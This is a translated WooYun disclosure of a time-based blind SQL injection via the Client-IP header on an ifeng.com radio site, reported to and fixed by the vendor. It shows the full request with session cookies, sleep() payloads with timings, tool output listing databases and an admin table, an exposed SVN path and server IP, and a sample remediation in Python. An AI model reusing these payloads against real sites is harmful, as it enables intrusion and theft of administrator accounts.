Vulnerability Summary

Defect ID: wooyun-2015-099144

Title: SQL injection on an ifeng.com (凤凰网) site leaks administrator information

Vendor: ifeng.com (凤凰网)

Author: 紫霞仙子

Submitted: 2015-03-02 21:30

Fixed: 2015-04-16 21:32

Published: 2015-04-16 21:32

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-03-02: Details sent to the vendor, awaiting vendor handling
2015-03-04: Vendor confirmed; details disclosed to the vendor only
2015-03-14: Details disclosed to core white hats and domain experts
2015-03-24: Details disclosed to regular white hats
2015-04-03: Details disclosed to intern white hats
2015-04-16: Details disclosed to the public

Brief description:

233

Detailed description:

I already reported a similar injection point last time.
After a fix is checked and completed, check every place this parameter appears, not just the single reported point.
This time the parameter has moved elsewhere and the problem is back.

GET /index.php/stat/clickStat HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
X-Requested-With: XMLHttpRequest
Referer: http://diantai.ifeng.com/
Cookie: userkey=fdcd168b895bd5eb513aef6445cdd278; PHPSESSID=vlq4mrh671r4h03dc79mg69gi5
Host: diantai.ifeng.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
Confirming that the injection point exists via sleep:
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ response time 9.141 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ response time 6.287 s
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ response time 3.292 s
Conclusion: time-based blind injection.
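The root cause here is a request header (Client-IP) being written into a statistics query unvalidated. As an added example (not code from the report or from the ifeng.com site), the pattern a defender would apply to this endpoint: treat every client-address header the same way, accept only an IP literal, and write the stat row with a parameterised query. The handler, table, and header list are assumptions; sqlite3 stands in for MySQL.

```python
import ipaddress
import sqlite3

# Every header the app or its proxies might read the client address from is
# validated the same way, so moving the injection from one header to another
# (as happened in this report) does not reopen the hole. Header list is assumed.
CLIENT_IP_HEADERS = ("Client-IP", "X-Forwarded-For", "X-Real-IP")


def client_ip_from_headers(headers, remote_addr):
    """Return a validated IP literal; fall back to the socket peer address."""
    for name in CLIENT_IP_HEADERS:
        raw = headers.get(name)
        if raw is None:
            continue
        # X-Forwarded-For may carry a comma-separated hop chain; use the first hop.
        candidate = raw.split(",")[0].strip()
        try:
            return str(ipaddress.ip_address(candidate))
        except ValueError:
            # Not an IP address (e.g. the sleep()/sysdate() payload): ignore it.
            continue
    return str(ipaddress.ip_address(remote_addr))


def new_db():
    """In-memory stand-in for the click-stat table (schema assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clickstat (ip TEXT, item_id INTEGER)")
    return conn


def record_click(conn, headers, remote_addr, item_id):
    """Write the stat row with a parameterised query only; no string building.
    (With a MySQL driver the placeholder would be %s instead of ?.)"""
    ip = client_ip_from_headers(headers, remote_addr)
    conn.execute("INSERT INTO clickstat (ip, item_id) VALUES (?, ?)", (ip, item_id))
    conn.commit()
    return ip


def count_rows(conn):
    return conn.execute("SELECT COUNT(*) FROM clickstat").fetchone()[0]


# Constructed sample requests: a benign client and the payload shape from the report.
BENIGN = {"Client-IP": "203.0.113.7"}
INJECTED = {"Client-IP": "if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'*/"}
```

Because the payload is never accepted as an address and the query has no string concatenation, a sleep() in the header can no longer reach MySQL at all, so the response-time differences shown above disappear.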

Proof of vulnerability:

---
Parameter: Client-IP #2* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"'||(SELECT 'npcl' FROM DUAL WHERE 7055=7055 AND SLEEP(5))||'/
---
back-end DBMS: MySQL 5.0.11
available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sst
[*] sst_stat
[*] sst_stat2014
[*] test
Database: sst_stat
[100 tables]
Administrator information:
Table: sst_admin
+-----------+---------+
| Table | Entries |
+-----------+---------+
| sst_admin | 395 |
+-----------+---------+
Pick any account and log in.

[Image: QQ图片20150302202853.png]

Fix recommendation:

There is also an SVN path disclosure: http://diantai.ifeng.com/web/static/index/built/.svn/entries
Found: svn://220.181.67.140/diantai/web/static/index/built
Asking for 20 rank again this time! Please grant it!

Copyright notice: when reposting, credit the source: 紫霞仙子@乌云


Vulnerability Response

Vendor response:

Severity: High

Rank: 10

Confirmed: 2015-03-04 13:35

Vendor reply:

Thank you very much; we are handling it.

Latest status:

None yet